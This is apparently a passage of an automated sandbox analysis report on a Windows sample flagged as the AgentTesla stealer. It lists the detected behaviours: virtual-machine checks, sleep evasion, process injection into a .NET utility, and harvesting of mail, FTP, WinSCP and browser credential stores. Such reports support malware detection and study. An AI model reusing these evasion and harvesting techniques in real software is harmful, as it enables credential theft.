                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6940Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 2557 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944Thread sleep count: 7299 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2557Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 7299Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.10.drBinary or memory string: VMware
                      Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.10.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: WerFault.exe, 0000000A.00000002.300816441.0000000005020000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016BCB20 LdrInitializeThunk,2_2_016BCB20
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 438000Jump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: FD0008Jump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Users\user\Desktop\W7UbgU8x18.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.W7UbgU8x18.exe.3938940.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W7UbgU8x18.exe.3938940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, type: MEMORY
